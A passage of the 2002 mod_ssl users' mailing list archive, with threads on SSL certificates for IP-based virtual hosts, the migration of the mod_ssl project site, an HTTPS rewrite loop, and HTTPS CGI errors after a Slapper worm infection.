1.3.x.  

As an aside, I thought using 2.0.x would be a "good thing"(tm) for the
latest and greatest features, however I haven't seen much from the
external side (meaning i haven't looked through the code at all) that's
different.  Can anyone tell me why i should try to stick with 2.0.x
instead of going back to 1.3.x?  Especially when i'll be doing a fair
amount of SSL traffic?

Thanks again.

...alex...


> 
> rgds,
> 
> Owen Boyle
> 
> >-----Original Message-----
> >From: Alex Tang [mailto:altitudespam@funkware.com]
> >Sent: Dienstag, 10. Dezember 2002 09:57
> >To: modssl-users@modssl.org
> >Cc: altitudespam@funkware.com
> >Subject: Re: Problem with IP/Port Based (NOT Name Based) virtual hosts.
> >
> >
> >Hi there.  Thanks for the help.  I have some followup comments 
> >inline...
> >
> >
> >On Tue, Dec 10, 2002 at 09:04:35AM +0100, Boyle Owen wrote:
> >> You must be the first guy to figure this out from the docs! Well done
> >> :-)
> >
> >Ha.  Thanks. :)
> >
> >> >However, I'm trying to setup my server (apache 2.0.43, OpenSSL
> >> >0.9.7-beta5, RH Linux 7.3) to do IP or Port based virtual hosts.  
> >> >
> >> >It seems that the server will only ever use the first cert 
> >declared.  
> >> >
> >> >I have the following in my httpd.conf (well, technically a 
> >> >file included by httpd.conf)
> >> >
> >> >SSLSessionCache         dbm:/var/cache/mod_ssl/scache
> >> >SSLSessionCacheTimeout  300
> >> >SSLMutex  file:logs/ssl_mutex
> >> >SSLRandomSeed startup builtin
> >> >SSLRandomSeed connect builtin
> >> >
> >> >
> >> >    ServerName                  A.funkware.com
> >> >    ServerAdmin                 A@funkware.com
> >> >    ErrorLog                    logs/A/error_log
> >> >    CustomLog                   logs/A/access_log combined
> >> >
> >> >    SSLEngine on
> >> >    SSLCertificateFile          /usr/local/etc/A.Cert
> >> >    SSLCertificateKeyFile       /usr/local/etc/A.key
> >> >
> >> >    DocumentRoot                /webdocs/A
> >> >
> >> >    # other sundry virtual host directory stuff here.
> >> >
> >> 
> >> Looks OK...
> >> 
> >> >
> >> >
> >> >    AddType                     application/x-x509-ca-cert .crt
> >> >    AddType                     application/x-pkcs7-crl    .crl
> >> >
> >> >
> >> >    ServerName                  B.funkware.com
> >> >    ServerAdmin                 B@funkware.com
> >> >    ErrorLog                    logs/B/error_log2
> >> >    CustomLog                   logs/B/access_log2 combined
> >> >
> >> >    SSLEngine on
> >> >    SSLCertificateFile          /etc/httpd/conf/httpd-cert-3443.cert
> >> >    SSLCertificateKeyFile       /etc/httpd/conf/httpd-cert-3443.key
> >> >
> >> >    DocumentRoot                
> >> >"/local/private/OpenCA/httpd/htdocs/pub"
> >> >
> >> >    # other sundry virtual host directory stuff here.
> >> >
> >> >
> >> 
> >> Looks OK too...  > 
> >> 
> >> >Like i said, when i startup the server, the first cert 
> >(A.Cert) is used
> >> >for both virtual hosts.  Does this seutp look correct?  Is 
> >> >there something
> >> >I missed?  
> >> >
> >> >Here are a couple more tidbits of info that i've learned...I 
> >> >don't know if
> >> >any of it is useful though...
> >> >
> >> >  * All the certs and keys are valid.  I've verified it 
> >using OpenSSL.
> >> >  * When I get the root page for  both virtual hosts, i get 
> >the proper
> >> >    page for each server.
> >> 
> >> What exactly do you mean here... Do you mean that:
> >> 
> >> https://A.funkware.com/ -> /webdocs/A
> >> https://B.funkware.com/ -> /local/private/OpenCA/httpd/htdocs/pub
> >> 
> >> or do you mean via HTTP?
> >
> >Sorry about that.  I should have been more clear.  Your assumption was
> >correct:
> >
> >    https://A.funkware.com/ -> /webdocs/A
> >    https://B.funkware.com/ -> /local/private/OpenCA/httpd/htdocs/pub
> >
> >This part of the VirtualHost information is being properly 
> >read and used.
> >
> >
> >> >  * If i change the second "SSLCertificateFile" to a bogus file or
> >> >    something that doesn't exist, the server will not startup (as
> >> >    expected).  However, the second cert is still not used.
> >> 
> >> As you say, this is normal - missing files or directories 
> >cause apache
> >> to abort during startup, long before any network setup is done.
> >
> >Sure.  I understand.
> >
> >> >  * If i change the order (putting the VirtualHost 
> >declaration for .33
> >> >    before .31), the behavior is consistant: the 
> >> >httpd-cert-3443.cert is
> >> >    used for both servers.
> >> 
> >> I suspect a DNS or routing problem... I notice you have real ".com"
> >> domain names which implies these sites are available on the internet.
> >> However, the IP addresses are on the 192.168.0.0 private 
> >network. This
> >> implies that you have a firewall and/or router with network address
> >> translation between the webserver and the web. Are you sure 
> >that, after
> >> NAT, A.funkware.com resolves to 192.168.7.31 and that B.funkware.com
> >> resolves to 192.168.7.33?
> >> 
> >> I suspect that both FQDNs are resolving to the same internal IP
> >> address... 
> >
> >You are correct again that I am working behind a firewall using the
> >192.168.7/24 network.  Unfortunately, I know that the FQDNs 
> >are correct (i
> >run the DNS).  
> >
> >For my testing, I am working completely behind the wall, I am 
> >running the
> >client on a machine at 192.168.7.20, and my netmask on all machines is
> >255.255.255.0, hence all machines are on the same subnet.  
> >There is no NAT
> >being done on my side of the firewall.
> >
> >Also, i get the same results if i connect using the IP Address 
> >instead of
> >the hostname.
> >
> >Here are some more things that I've discovered...
> >
> >  * The two virtual hosts have their respective error logs going to:
> >     A -> logs/A/error_log
> >     B -> logs/b/error_log2
> >
> >    It just so happens that the DNs for both certificates are not the
> >    "correct" DNs for the servers:
> >
> >     A -> CN=*.funkware.com, O=Funkware, c=US
> >     B -> CN=newx.funkware.com, O=Funkware, c=US
> >
> >    I know that either of these certs will work properly when 
> >used solo.  
> >
> >    The thing about the improper CN in the DN is that when the server
> >    starts up, the error log will complain that the DN in the cert is
> >    improper.  For exmaple, in logs/A/error_log when the "A" 
> >cert is used,
> >    i see: 
> >    
> >      [Mon Dec 09 23:04:32 2002] [warn] RSA server certificate
> >        CommonName (CN) `*.funkware.com' does NOT match server name!?
> >
> >    The thing i noticed is that BOTH of the error logs for the two
> >    respective servers complain about the same name.  (The CN 
> >in the error
> >    message for both servers will be the same (either *.funkware.com if
> >    the "A" Cert is used, or "newx.funkware.com" if the "B" 
> >cert is used).
> >
> >  * If i use the openssl s_client to connect to the respective machines
> >    (either using DNS or using the IP address), the cert is always the
> >    same.
> >
> >Thanks again.  
> >
> >If there's any more information I can provide, please let me know.
> >
> >...alex...
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >
> 
> This message is for the named person's use only. It may contain
> confidential, proprietary or legally privileged information. No
> confidentiality or privilege is waived or lost by any mistransmission.
> If you receive this message in error, please notify the sender urgently
> and then immediately delete the message and any copies of it from your
> system. Please also immediately destroy any hardcopies of the message.
> You must not, directly or indirectly, use, disclose, distribute, print,
> or copy any part of this message if you are not the intended recipient.
> The sender's company reserves the right to monitor all e-mail
> communications through their networks. Any views expressed in this
> message are those of the individual sender, except where the message
> states otherwise and the sender is authorised to state them to be the
> views of the sender's company. 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Dec 15 09:41:50 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 61F3A2AA099; Sun, 15 Dec 2002 09:41:50 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (unknown [195.27.176.156])
	by master.modssl.org (Postfix) with ESMTP id D42202AA07D
	for ; Sun, 15 Dec 2002 09:41:49 +0100 (CET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id B31164CE68E; Sun, 15 Dec 2002 09:41:49 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id B189E286AD; Sun, 15 Dec 2002 09:41:11 +0100 (CET)
Date: Sun, 15 Dec 2002 09:41:11 +0100
From: "Ralf S. Engelschall" 
To: modssl-users@modssl.org
Subject: mod_ssl Project Environment Migrated
Message-ID: <20021215084111.GA20406@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Just for your information: the Apache mod_ssl project environment was
migrated to a new location. In case of any problems, contact me.

                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Dec 15 13:59:17 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 778A82AA099; Sun, 15 Dec 2002 13:59:17 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id E1AB22AA07D
	for ; Sun, 15 Dec 2002 13:59:11 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id A5C7E6E410D; Sun, 15 Dec 2002 14:00:57 +0100 (CET)
Date: Sun, 15 Dec 2002 14:00:57 +0100
From: Mads Toftum 
To: "Ralf S. Engelschall" 
Cc: modssl-users@modssl.org
Subject: Re: mod_ssl Project Environment Migrated
Message-ID: <20021215130057.GA22087@toftum.dk>
Mail-Followup-To: "Ralf S. Engelschall" ,
	modssl-users@modssl.org
References: <20021215084111.GA20406@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20021215084111.GA20406@engelschall.com>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sun, Dec 15, 2002 at 09:41:11AM +0100, Ralf S. Engelschall wrote:
> Just for your information: the Apache mod_ssl project environment was
> migrated to a new location. In case of any problems, contact me.
> 
It seems that cvs is broken - http://www.modssl.org/source/cvs/ and
the docs taken from the sorce - like 
http://www.modssl.org/source/exp/mod_ssl/pkg.mod_ssl/INSTALL
both result in Internal Server Error.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Dec 15 14:55:08 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 73F1D2AA099; Sun, 15 Dec 2002 14:55:08 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (unknown [195.27.176.156])
	by master.modssl.org (Postfix) with ESMTP id BEC572AA078
	for ; Sun, 15 Dec 2002 14:55:07 +0100 (CET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 9F42A4CE581; Sun, 15 Dec 2002 14:55:07 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 65CB8286AD; Sun, 15 Dec 2002 14:54:58 +0100 (CET)
Date: Sun, 15 Dec 2002 14:54:58 +0100
From: "Ralf S. Engelschall" 
To: modssl-users@modssl.org
Subject: Re: mod_ssl Project Environment Migrated
Message-ID: <20021215135458.GA49430@engelschall.com>
References: <20021215084111.GA20406@engelschall.com> <20021215130057.GA22087@toftum.dk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20021215130057.GA22087@toftum.dk>
User-Agent: Mutt/1.4i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sun, Dec 15, 2002, Mads Toftum wrote:

> On Sun, Dec 15, 2002 at 09:41:11AM +0100, Ralf S. Engelschall wrote:
> > Just for your information: the Apache mod_ssl project environment was
> > migrated to a new location. In case of any problems, contact me.
> >
> It seems that cvs is broken - http://www.modssl.org/source/cvs/ and
> the docs taken from the sorce - like
> http://www.modssl.org/source/exp/mod_ssl/pkg.mod_ssl/INSTALL
> both result in Internal Server Error.

Ops, yes, of course. Because there is no more active development on
mod_ssl for Apache 1.3, the CVS environment is no longer provided
publically (because there would be no interesting things to monitor at
all) and hence the new public project environment has no CVS setup.
So, CVS related things are now gone from the website. Just my fault in
forgetting to synchronize the website. Now fixed. Thanks for the hint.

                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Dec 15 17:42:15 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EE0292AA099; Sun, 15 Dec 2002 17:42:14 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 697992AA078
	for ; Sun, 15 Dec 2002 17:42:10 +0100 (CET)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id LAA11784;
	Sun, 15 Dec 2002 11:40:44 -0500
Date: Sun, 15 Dec 2002 11:40:43 -0500 (EST)
From: "R. DuFresne" 
To: "Ralf S. Engelschall" 
Cc: modssl-users@modssl.org
Subject: Re: mod_ssl Project Environment Migrated
In-Reply-To: <20021215135458.GA49430@engelschall.com>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sun, 15 Dec 2002, Ralf S. Engelschall wrote:

> On Sun, Dec 15, 2002, Mads Toftum wrote:
> 
> > On Sun, Dec 15, 2002 at 09:41:11AM +0100, Ralf S. Engelschall wrote:
> > > Just for your information: the Apache mod_ssl project environment was
> > > migrated to a new location. In case of any problems, contact me.
> > >
> > It seems that cvs is broken - http://www.modssl.org/source/cvs/ and
> > the docs taken from the sorce - like
> > http://www.modssl.org/source/exp/mod_ssl/pkg.mod_ssl/INSTALL
> > both result in Internal Server Error.
> 
> Ops, yes, of course. Because there is no more active development on
> mod_ssl for Apache 1.3, the CVS environment is no longer provided
> publically (because there would be no interesting things to monitor at
> all) and hence the new public project environment has no CVS setup.
> So, CVS related things are now gone from the website. Just my fault in
> forgetting to synchronize the website. Now fixed. Thanks for the hint.

Ralf,

does this imply there are to be no more apache 1.3 developement or version
updates, thus modssl is now moving entirely into the source for apache
2.0?


Thanks,

Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Dec 15 19:39:50 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0906A2AA099; Sun, 15 Dec 2002 19:39:50 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (unknown [195.27.176.156])
	by master.modssl.org (Postfix) with ESMTP id 7C4242AA078
	for ; Sun, 15 Dec 2002 19:39:49 +0100 (CET)
Received: by visp.engelschall.com (Postfix, from userid 1000)
	id 5A3754CE715; Sun, 15 Dec 2002 19:39:49 +0100 (CET)
Date: Sun, 15 Dec 2002 19:39:49 +0100
From: "Ralf S. Engelschall" 
To: modssl-users@modssl.org
Subject: Re: mod_ssl Project Environment Migrated
Message-ID: <20021215183949.GA13947@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4i
Organization: Engelschall, Germany.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


In article  you wrote:

>> > > Just for your information: the Apache mod_ssl project environment was
>> > > migrated to a new location. In case of any problems, contact me.
>> > >
>> > It seems that cvs is broken - http://www.modssl.org/source/cvs/ and
>> > the docs taken from the sorce - like
>> > http://www.modssl.org/source/exp/mod_ssl/pkg.mod_ssl/INSTALL
>> > both result in Internal Server Error.
>> 
>> Ops, yes, of course. Because there is no more active development on
>> mod_ssl for Apache 1.3, the CVS environment is no longer provided
>> publically (because there would be no interesting things to monitor at
>> all) and hence the new public project environment has no CVS setup.
>> So, CVS related things are now gone from the website. Just my fault in
>> forgetting to synchronize the website. Now fixed. Thanks for the hint.
> 
> does this imply there are to be no more apache 1.3 developement or version
> updates, thus modssl is now moving entirely into the source for apache
> 2.0?

Err... mod_ssl already _IS_ included in the official Apache 2 source tree...

                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Dec 16 15:54:04 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8B4522AA09C; Mon, 16 Dec 2002 15:54:04 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id 1234B2AA09A; Mon, 16 Dec 2002 15:54:04 +0100 (CET)
Received: from relais1.stna.aviation-civile.gouv.fr (relais1.stna.aviation-civile.gouv.fr [143.196.161.40])
	by master.modssl.org (Postfix) with ESMTP id 12D402AA095
	for ; Mon, 16 Dec 2002 15:32:28 +0100 (CET)
Received: by relais1.stna.aviation-civile.gouv.fr (MTA server DGAC - STNA, from userid 0)
	id 665BD6F234; Mon, 16 Dec 2002 15:32:21 +0100 (CET)
Received: from cranberries.stna.dgac.fr (localhost.localdomain [127.0.0.1])
	by relais1.stna.aviation-civile.gouv.fr (MTA server DGAC - STNA) with ESMTP id 1A1FE7712D
	for ; Mon, 16 Dec 2002 15:32:21 +0100 (CET)
Subject: Mod_ssl  and apache 2.0.40
To: modssl-users@modssl.org
X-Mailer: Lotus Notes Release 5.07a  May 14, 2001
Message-ID: 
From: francoise.tukalo@aviation-civile.gouv.fr
Date: Mon, 16 Dec 2002 15:32:19 +0100
X-MIMETrack: Serialize by Router on CS-SUD/DGAC(Release 5.07a |May 14, 2001) at 16/12/2002
 15:30:17
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: francoise.tukalo@aviation-civile.gouv.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I install on a PC linux redhat 8.0 a web server apache 2.0.40 and mod ssl
0.9.6b (configuration include in redhat 8.0)

I want to access a directory of my site with ssl. The directory site pages
have been written in html without ssl.
To avoid the rewritting of all pages, I try to put the following directives
in /etc/httpd/conf.d/ssl.conf


RewriteEngine        on
RewriteCond %{HTTPS} !=on
RewriteRule ^/home/httpd/html/telechargement/(.*)$
https://%{SERVER_NAME}/telechargement/$1 [R,L]


If I test http://machine.site/telechargement/fichier.html. The server
permanently loops .
I obtain  the following messages in ssl_access_log :

143.196.30.134 - - [10/Dec/2002:11:00:22 +0100] "GET /test/compteftp.doc
HTTP/1.1" 302 295
143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET /test/compteftp.doc
HTTP/1.1" 302 295
143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET /test/compteftp.doc
HTTP/1.1" 302 295
143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET /test/compteftp.doc
HTTP/1.1" 302 295
143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET /test/compteftp.doc
HTTP/1.1" 302 295
143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET /test/compteftp.doc
HTTP/1.1" 302 295
143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET /test/compteftp.doc
HTTP/1.1" 302 295
143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET /test/compteftp.doc
HTTP/1.1" 302 295
143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET /test/compteftp.doc
HTTP/1.1" 302 295
143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET /test/compteftp.doc
HTTP/1.1" 302 295
143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET /test/compteftp.doc
HTTP/1.1" 302 295
143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET /test/compteftp.doc
HTTP/1.1" 302 295

I read a lot of archives of the mail and the faq of apache. I have seen
that a lot of solutions for this matter has been
 found with apache 1.3.*. So i compile apache_1.3.27 with mod-ssl_2.8.12 on
the same PC. I test this server with the same config and it works fine.

Does anyone know where the problem is?

Regards


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 17 09:12:03 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3C2462AA085; Tue, 17 Dec 2002 09:12:03 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id E88212AA083; Tue, 17 Dec 2002 09:12:02 +0100 (CET)
Received: from parmenides.zen.co.uk (parmenides.zen.co.uk [212.23.8.69])
	by master.modssl.org (Postfix) with SMTP id B62CE2AA081
	for ; Mon, 16 Dec 2002 17:00:44 +0100 (CET)
Received: (qmail 10843 invoked from network); 16 Dec 2002 16:00:42 -0000
Received: from protagoras.zen.co.uk (212.23.8.61)
  by parmenides.zen.co.uk with QMQP; 16 Dec 2002 16:00:42 -0000
Received: from dsl-217-155-32-52.zen.co.uk (HELO localhost.localdomain) (217.155.32.52)
  by protagoras.zen.co.uk with SMTP; 16 Dec 2002 16:00:41 -0000
X-Zen-Trace: 217.155.32.52
Subject: SSL internal server errors
From: giorgos 
To: modssl-users@modssl.org
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.5 
Date: 16 Dec 2002 16:06:48 +0000
Message-Id: <1040054808.977.9.camel@perlfect>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: giorgos 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

hi all, 

i have been encountering a pretty strange problem on my webserver since
i caught the slapper work a few weeks ago. 

all https connections to cgi scripts produce an internal server error
sometimes together will this message in the log file: 

OpenSSL: error:1406B458:SSL routines:GET_CLIENT_MASTER_KEY:key arg too
long 

after some research and consultation with support staff from thawtee, my
certificate issuer, i was told that i have to have my certificate
reissued as the worm has corrupted it. i have replaced the certificate
with the brand new one i ordered but i still have the same problems. 

i also tried disabling SSLv2 but to no avail. 

static pages work fine under https and the cgi scripts that fail under
https work fine under http. 

i have upgraded all relevant software and removed the worm. does anyone
else have the same problem or any clue on what could be causing it? 

my setup is redhat 7.3 with: 
apache 1.3.27 + mod_ssl 2.8.12 + openssl 0.9.6b 

any help will be greatly appreciated. 

many thanks 
giorgos 



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Dec 17 09:30:10 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D2B6F2AA084; Tue, 17 Dec 2002 09:30:10 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id 00FDD2AA078
	for ; Tue, 17 Dec 2002 09:30:04 +0100 (CET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id gBH8U15V015695
	for ; Tue, 17 Dec 2002 09:30:01 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gBH8Tx0T015616
	for ; Tue, 17 Dec 2002 09:30:00 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Mod_ssl  and apache 2.0.40
Date: Tue, 17 Dec 2002 09:29:59 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A618@SOMEXEVS001.ex.ordersx.org>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Mod_ssl  and apache 2.0.40
Importance: normal
Thread-Index: AcKlEyuDm77SIwJCTf+h+buvkzzi9QAkwzcA
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

It is an obvious loop. Why are you suprised that this loops? Please
provide:

1) Example of incoming URL
2) What you want it to translate to

Rgds,

Owen Boyle

>-----Original Message-----
>From: francoise.tukalo@aviation-civile.gouv.fr
>[mailto:francoise.tukalo@aviation-civile.gouv.fr]
>Sent: Montag, 16. Dezember 2002 15:32
>To: modssl-users@modssl.org
>Subject: Mod_ssl and apache 2.0.40
>
>
>Hello,
>
>I install on a PC linux redhat 8.0 a web server apache 2.0.40 
>and mod ssl
>0.9.6b (configuration include in redhat 8.0)
>
>I want to access a directory of my site with ssl. The 
>directory site pages
>have been written in html without ssl.
>To avoid the rewritting of all pages, I try to put the 
>following directives
>in /etc/httpd/conf.d/ssl.conf
>
>
>RewriteEngine        on
>RewriteCond %{HTTPS} !=on
>RewriteRule ^/home/httpd/html/telechargement/(.*)$
>https://%{SERVER_NAME}/telechargement/$1 [R,L]
>
>
>If I test http://machine.site/telechargement/fichier.html. The server
>permanently loops .
>I obtain  the following messages in ssl_access_log :
>
>143.196.30.134 - - [10/Dec/2002:11:00:22 +0100] "GET 
>/test/compteftp.doc
>HTTP/1.1" 302 295
>143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET 
>/test/compteftp.doc
>HTTP/1.1" 302 295
>143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET 
>/test/compteftp.doc
>HTTP/1.1" 302 295
>143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET 
>/test/compteftp.doc
>HTTP/1.1" 302 295
>143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET 
>/test/compteftp.doc
>HTTP/1.1" 302 295
>143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET 
>/test/compteftp.doc
>HTTP/1.1" 302 295
>143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET 
>/test/compteftp.doc
>HTTP/1.1" 302 295
>143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET 
>/test/compteftp.doc
>HTTP/1.1" 302 295
>143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET 
>/test/compteftp.doc
>HTTP/1.1" 302 295
>143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET 
>/test/compteftp.doc
>HTTP/1.1" 302 295
>143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET 
>/test/compteftp.doc
>HTTP/1.1" 302 295
>143.196.30.134 - - [10/Dec/2002:11:00:23 +0100] "GET 
>/test/compteftp.doc
>HTTP/1.1" 302 295
>
>I read a lot of archives of the mail and the faq of apache. I have seen
>that a lot of solutions for this matter has been
> found with apache 1.3.*. So i compile apache_1.3.27 with 
>mod-ssl_2.8.12 on
>the same PC. I test this server with the same config and it works fine.
>
>Does anyone know where the problem is?
>
>Regards
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
